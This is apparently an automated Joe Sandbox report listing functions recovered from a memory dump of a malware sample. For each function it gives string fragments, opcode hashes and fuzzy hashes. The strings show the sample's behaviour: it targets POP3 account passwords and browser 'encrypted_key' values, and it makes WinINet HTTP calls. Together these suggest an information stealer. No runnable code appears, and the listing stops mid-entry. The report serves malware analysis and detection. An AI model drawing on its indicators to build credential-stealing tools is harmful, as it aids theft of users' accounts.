                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: I$O$R$V$_$c$k$l$o$r$r$t$t$u$v$x
                                                                                                                                                              • API String ID: 0-2161164058
                                                                                                                                                              • Opcode ID: 6acd76fb3d41c7371e38fc8afd5c5642314241b492a9ba8a3a80ebb7a031bff5
                                                                                                                                                              • Instruction ID: 39b27c7038e6fd38a29fe592000a260a30bab0db5463520ec3368c6084580bb1
                                                                                                                                                              • Opcode Fuzzy Hash: 6acd76fb3d41c7371e38fc8afd5c5642314241b492a9ba8a3a80ebb7a031bff5
                                                                                                                                                              • Instruction Fuzzy Hash: 08311EB1D01228DBEB10DF94D848BEEBBBABF14304F54415DE50CA7281DBB95A48CFA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050247A2 Relevance: 17.7, Strings: 14, Instructions: 163COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $O$S$\$a$a$a$e$e$l$o$p$r$t
                                                                                                                                                              • API String ID: 0-734595753
                                                                                                                                                              • Opcode ID: 6a5bae73b40d7336fef49ca4085546ebccec4b444d50756544c37034d328ab37
                                                                                                                                                              • Instruction ID: 5e7b29e5db2e7919232d8fa78dd32332661a47c38da7506bd36e9efcbf95836e
                                                                                                                                                              • Opcode Fuzzy Hash: 6a5bae73b40d7336fef49ca4085546ebccec4b444d50756544c37034d328ab37
                                                                                                                                                              • Instruction Fuzzy Hash: 2F51A1B6D00228AADF60DF94DC88FEE73BDEF54700F044199EA4D56141EBB5A684CFA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CD16 Relevance: 17.7, Strings: 14, Instructions: 158COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: A$ConnectA$Http$HttpOpenRequestA$InternetConnectA$InternetOpenA$Open$OpenRequestA$Requ$RequestA$ectA$estA$rnetConnectA$rnetOpenA
                                                                                                                                                              • API String ID: 0-2462375318
                                                                                                                                                              • Opcode ID: 5452817714c2daa84cec4ce3d2a7dccd5e41ae751087edd5e33906131385f024
                                                                                                                                                              • Instruction ID: 6846dbb42bd9eee5e64e247ef32d121a4ecad759374348815a11b5b1f9fb8de3
                                                                                                                                                              • Opcode Fuzzy Hash: 5452817714c2daa84cec4ce3d2a7dccd5e41ae751087edd5e33906131385f024
                                                                                                                                                              • Instruction Fuzzy Hash: 5E418AB6605228AFDB14DF98E840DEFB7A9FF98310F148549FD58A7300D631AE118BE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05024D12 Relevance: 17.7, Strings: 14, Instructions: 156COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $O$S$\$a$a$a$e$e$l$o$p$r$t
                                                                                                                                                              • API String ID: 0-734595753
                                                                                                                                                              • Opcode ID: 33ac11d62356dc4a7a702cc3ce670b34efb1730c01a286bed612e65fa00674d6
                                                                                                                                                              • Instruction ID: 665bd1c0684ff75a61139dd36c678b1937feca2ef6714de531b5213dd6189b3f
                                                                                                                                                              • Opcode Fuzzy Hash: 33ac11d62356dc4a7a702cc3ce670b34efb1730c01a286bed612e65fa00674d6
                                                                                                                                                              • Instruction Fuzzy Hash: E451B4B6D00228AADF60DF94DC88FEE73BDAF54700F044199E60D5A141EBB56BC88F61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050215E2 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                                              • API String ID: 0-392141074
                                                                                                                                                              • Opcode ID: 85372f4f5744c1593165fae5d1caabd91033aad59abbdd7989932d49976eaa86
                                                                                                                                                              • Instruction ID: 38aaf2cf16886e488f57ac8585b508cc9e6f14cb374ae5562d06808ddc951a60
                                                                                                                                                              • Opcode Fuzzy Hash: 85372f4f5744c1593165fae5d1caabd91033aad59abbdd7989932d49976eaa86
                                                                                                                                                              • Instruction Fuzzy Hash: 5A7121B1E50228AADB25DF94DC44FEEB7BDBF14700F04419DE60DAA180EB746B44CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050215DD Relevance: 16.4, Strings: 13, Instructions: 171COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                                              • API String ID: 0-392141074
                                                                                                                                                              • Opcode ID: 182052a1c92a5f00a854b2aa7395c1370a7b2feb80193b3f9455bdf837fcbefe
                                                                                                                                                              • Instruction ID: 2a381451b6ed7ffffe0f25da14d77e0423b1472ed34bc74239ce8e6ce48bb0d2
                                                                                                                                                              • Opcode Fuzzy Hash: 182052a1c92a5f00a854b2aa7395c1370a7b2feb80193b3f9455bdf837fcbefe
                                                                                                                                                              • Instruction Fuzzy Hash: 8B611FB1E50228AADB25DFA4DC44FEEB7BDBF18700F04419DE60DA6180EB745748CB55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0501CDE2 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                                                                                                                              • API String ID: 0-2356907671
                                                                                                                                                              • Opcode ID: 1a4276e3f8bfab30356a0420632fda3e7c193d3a7ad41aeb2f944c283255fc52
                                                                                                                                                              • Instruction ID: 533cb70bf446dc8d3e68c8203a0cd58c6ffe84363419a075c26cc4129ef054f9
                                                                                                                                                              • Opcode Fuzzy Hash: 1a4276e3f8bfab30356a0420632fda3e7c193d3a7ad41aeb2f944c283255fc52
                                                                                                                                                              • Instruction Fuzzy Hash: 998191B6E413286ADB51EBA4DC88FEF73BDAF64700F044499B50DA2140EB759788CF61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05022912 Relevance: 15.2, Strings: 12, Instructions: 151COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: F$P$T$T$d$d$f$i$r$r$u$x
                                                                                                                                                              • API String ID: 0-2987356081
                                                                                                                                                              • Opcode ID: 9ff3c2dc73b069038dd9e43d269be20871a3be7eb3613a0792a4f62ee3e830d4
                                                                                                                                                              • Instruction ID: be6cfd8131cbb97d780bdfc949b63613b7258c600b1c81b4ff65a4f9772bfe3d
                                                                                                                                                              • Opcode Fuzzy Hash: 9ff3c2dc73b069038dd9e43d269be20871a3be7eb3613a0792a4f62ee3e830d4
                                                                                                                                                              • Instruction Fuzzy Hash: 5C419471900225AAEB20EF91EC49FFF7BBCEF65710F14801DE90966180E7B55649CBB2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05016D89 Relevance: 13.9, Strings: 11, Instructions: 156COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                              • API String ID: 0-685823316
                                                                                                                                                              • Opcode ID: 35ba1e968bf54a9db9e218e1eb107d24f1bb3e9549be4c73c227676645cdeb30
                                                                                                                                                              • Instruction ID: 8a6d83ff4bffbe50783c4d35236801d446404ac03e2db7510919522a5beab64b
                                                                                                                                                              • Opcode Fuzzy Hash: 35ba1e968bf54a9db9e218e1eb107d24f1bb3e9549be4c73c227676645cdeb30
                                                                                                                                                              • Instruction Fuzzy Hash: 5451BEB1900218AFDB10DFE4DC88AFEBBB8FF59300F40816DE559AA140DB755A49CB61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05016E02 Relevance: 13.9, Strings: 11, Instructions: 128COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                              • API String ID: 0-685823316
                                                                                                                                                              • Opcode ID: 3aa128beba90a5131d75d81b1ca95f4ddc9aea13bc4e966e6826f57ae47b2e79
                                                                                                                                                              • Instruction ID: 579b67739d4283870fda9ca30423c8ccc568d87388466c55e7988c10fcf86085
                                                                                                                                                              • Opcode Fuzzy Hash: 3aa128beba90a5131d75d81b1ca95f4ddc9aea13bc4e966e6826f57ae47b2e79
                                                                                                                                                              • Instruction Fuzzy Hash: 514107B2D0021CAFEB10DFD4DC84AFEBBBDFB58304F40816DE519A6240DB755A498B61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05016312 Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                              • API String ID: 0-685823316
                                                                                                                                                              • Opcode ID: 8a0cdb37ae62773525f59921a5603def3f995a993024421018bb8a84d2941d54
                                                                                                                                                              • Instruction ID: 1b45eb110314a180142067400b49b8fbc8225b217888351d9a9301d64a2f0f22
                                                                                                                                                              • Opcode Fuzzy Hash: 8a0cdb37ae62773525f59921a5603def3f995a993024421018bb8a84d2941d54
                                                                                                                                                              • Instruction Fuzzy Hash: 492173B1D51218AAEF50DFD4DC89BEEBBB9BF08704F04815CE608B6180DBB55648CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05016309 Relevance: 13.8, Strings: 11, Instructions: 82COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                              • API String ID: 0-685823316
                                                                                                                                                              • Opcode ID: 4e974530073870be95e6a1edb38585a0c58ce87d05bc7efa5061c74b2bb7cc20
                                                                                                                                                              • Instruction ID: 3187eb98e9d19477fbf09fc8b69508c27b574a5cf9582f6668ae6a8bd0c70faa
                                                                                                                                                              • Opcode Fuzzy Hash: 4e974530073870be95e6a1edb38585a0c58ce87d05bc7efa5061c74b2bb7cc20
                                                                                                                                                              • Instruction Fuzzy Hash: 6F2182B1D51218AEEF40DFD4DC88BEEBBB9BF18704F04815DE6087A180DBB55648CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050261D2 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                                                                              • API String ID: 0-2304485323
                                                                                                                                                              • Opcode ID: 1698fb5135055e1cbb66986119eab17a13890434a1b617e24c5c81033359b9d1
                                                                                                                                                              • Instruction ID: efcf6e30bbd9322396f6598eaee32bc1b03a08ee63c7ec1f98c53210b5cb3786
                                                                                                                                                              • Opcode Fuzzy Hash: 1698fb5135055e1cbb66986119eab17a13890434a1b617e24c5c81033359b9d1
                                                                                                                                                              • Instruction Fuzzy Hash: 3DD119B1A41214ABEB50DFA4DC88FEEB3BDBF58300F14451DE149E7280EB79A941CB65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050261CD Relevance: 12.7, Strings: 10, Instructions: 210COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                                                                              • API String ID: 0-2304485323
                                                                                                                                                              • Opcode ID: 87251c94e45f15d17bd16c7565fae59db5ff4b10cf7e4cae76cddec1f7f8f457
                                                                                                                                                              • Instruction ID: 42116239a4e9ba61d71a06b8472d49132e150aca5970245c3f2a966eeeda4c94
                                                                                                                                                              • Opcode Fuzzy Hash: 87251c94e45f15d17bd16c7565fae59db5ff4b10cf7e4cae76cddec1f7f8f457
                                                                                                                                                              • Instruction Fuzzy Hash: 698116B1A01218AFEB50DFA4D888FEEB7F9BF58300F14451DE509E7240EB79A905CB65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05023045 Relevance: 12.6, Strings: 10, Instructions: 97COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$unt$unt$word$word
                                                                                                                                                              • API String ID: 0-861207480
                                                                                                                                                              • Opcode ID: 05f4cb5e3f2fe53eba38231547f12b732f8922b520034d6d509e30ce6a1ed8cd
                                                                                                                                                              • Instruction ID: a5bdbece2482969497691974e1f54a7d4149b6842759b46923598fa4d149821c
                                                                                                                                                              • Opcode Fuzzy Hash: 05f4cb5e3f2fe53eba38231547f12b732f8922b520034d6d509e30ce6a1ed8cd
                                                                                                                                                              • Instruction Fuzzy Hash: 6D41F6B0D01268AEDB61CFA99845BEEBFF8AF19300F10406AE90CFB241E7744A45CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05017442 Relevance: 11.4, Strings: 9, Instructions: 122COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: C$U$a$b$d$i$k$n$o
                                                                                                                                                              • API String ID: 0-3121204512
                                                                                                                                                              • Opcode ID: e93b607ab6ca61172f8c1a0fc92f55f7706125ebcb858e8f0b8d2ecfd97e3ce1
                                                                                                                                                              • Instruction ID: b2458cd179e4f65c4917018eb8a250e3e6afe130bceb0840df020ae73db58681
                                                                                                                                                              • Opcode Fuzzy Hash: e93b607ab6ca61172f8c1a0fc92f55f7706125ebcb858e8f0b8d2ecfd97e3ce1
                                                                                                                                                              • Instruction Fuzzy Hash: 444176B1A40208AAD710EFA4DC89FFF77BDAF55700F10841DE91DA7140EBB5964487A6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05022642 Relevance: 10.2, Strings: 8, Instructions: 235COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: URL: $URL: $.$e$i$n$o$p
                                                                                                                                                              • API String ID: 0-3231755416
                                                                                                                                                              • Opcode ID: d6cd3a281afdc96763e173b62e60e05996318d219c1dd3ff3d40bc3f7a98a17a
                                                                                                                                                              • Instruction ID: 7f1421b81c63c669fe8fe1287c87a49792386f231069177b55c9b6ff5910f328
                                                                                                                                                              • Opcode Fuzzy Hash: d6cd3a281afdc96763e173b62e60e05996318d219c1dd3ff3d40bc3f7a98a17a
                                                                                                                                                              • Instruction Fuzzy Hash: 3D915BB1900219AEEB20DFA4DC84FFEB7B8FF58300F04446DE509A7241E770A645CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502564A Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: :$:$P$U$U$e$l$s
                                                                                                                                                              • API String ID: 0-522774390
                                                                                                                                                              • Opcode ID: d0fd0e1322d8e6c9aa9b0ae66ed8e922e66a0df87e081f9594ffec2d52c57d81
                                                                                                                                                              • Instruction ID: 00f6eaf54d00b4a8de5b522ce78a38ba01280dcfdff3a2a6422cb58b979b097d
                                                                                                                                                              • Opcode Fuzzy Hash: d0fd0e1322d8e6c9aa9b0ae66ed8e922e66a0df87e081f9594ffec2d52c57d81
                                                                                                                                                              • Instruction Fuzzy Hash: E9915AB1A40314AFEB50DFA4DC59FEEB7F9BF94300F14851DA5099B280EB75A901CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05025652 Relevance: 10.2, Strings: 8, Instructions: 228COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: :$:$P$U$U$e$l$s
                                                                                                                                                              • API String ID: 0-522774390
                                                                                                                                                              • Opcode ID: 0aff680029212ef8ace122f926fa4bbb7d128b96a5d35db659fd5be68ba5acc9
                                                                                                                                                              • Instruction ID: 74e8dde8b36004274e22f348c03e6ba119fd55fa0a2f540a52714ddb6096464c
                                                                                                                                                              • Opcode Fuzzy Hash: 0aff680029212ef8ace122f926fa4bbb7d128b96a5d35db659fd5be68ba5acc9
                                                                                                                                                              • Instruction Fuzzy Hash: 079159B1A40314AFEB50DFA4DC99FEEB7F9BF94300F14851DA509AB280EB75A901CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05025032 Relevance: 10.2, Strings: 8, Instructions: 219COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: "}$L$S$\$a$c$encrypted_key$l
                                                                                                                                                              • API String ID: 0-2423294891
                                                                                                                                                              • Opcode ID: 2b531e2edddbb7de0f5f9aa601a1d47932aca52a34d7420fe091813c1662d1c7
                                                                                                                                                              • Instruction ID: 9e0eb24beeb1651868fb76b251b8793bba35d73913acececbfbd872364953278
                                                                                                                                                              • Opcode Fuzzy Hash: 2b531e2edddbb7de0f5f9aa601a1d47932aca52a34d7420fe091813c1662d1c7
                                                                                                                                                              • Instruction Fuzzy Hash: 3A8181B1D10328ABDB20DFA4EC44BEEB7F8BF64700F144169E50DAB240E7B49A45CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502502F Relevance: 10.2, Strings: 8, Instructions: 180COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: "}$L$S$\$a$c$encrypted_key$l
                                                                                                                                                              • API String ID: 0-2423294891
                                                                                                                                                              • Opcode ID: 82c94189871a928f2a319c0c3ea1daf97d69d59d3d8d8685481caf1b3d4e7395
                                                                                                                                                              • Instruction ID: 3de5dee0596f405f6022d90b6bf160272e5cd3e7c2a7a65c8bdaecb7a5a9b3d3
                                                                                                                                                              • Opcode Fuzzy Hash: 82c94189871a928f2a319c0c3ea1daf97d69d59d3d8d8685481caf1b3d4e7395
                                                                                                                                                              • Instruction Fuzzy Hash: 8C717EB0D00318AEDB60DFA8D844BEEB7F9BF54300F14406DD50DAB280E7B49A45CB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CDCD Relevance: 10.1, Strings: 8, Instructions: 57COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA$rnetOpenA
                                                                                                                                                              • API String ID: 0-3717097293
                                                                                                                                                              • Opcode ID: 2c9e0a23b4b540b81755fc3df40126a6364e31df89466c589fbc3fe3134dd704
                                                                                                                                                              • Instruction ID: f172444e229457cd3e28224d8f5d7cb6840e7ef564e3b2fc6f0995e5648ecba7
                                                                                                                                                              • Opcode Fuzzy Hash: 2c9e0a23b4b540b81755fc3df40126a6364e31df89466c589fbc3fe3134dd704
                                                                                                                                                              • Instruction Fuzzy Hash: 8F1170B15191586FCB14CF98E941DEF7BB8FB48310F05468DFA4897200C6349E118BA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05023E52 Relevance: 8.9, Strings: 7, Instructions: 186COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
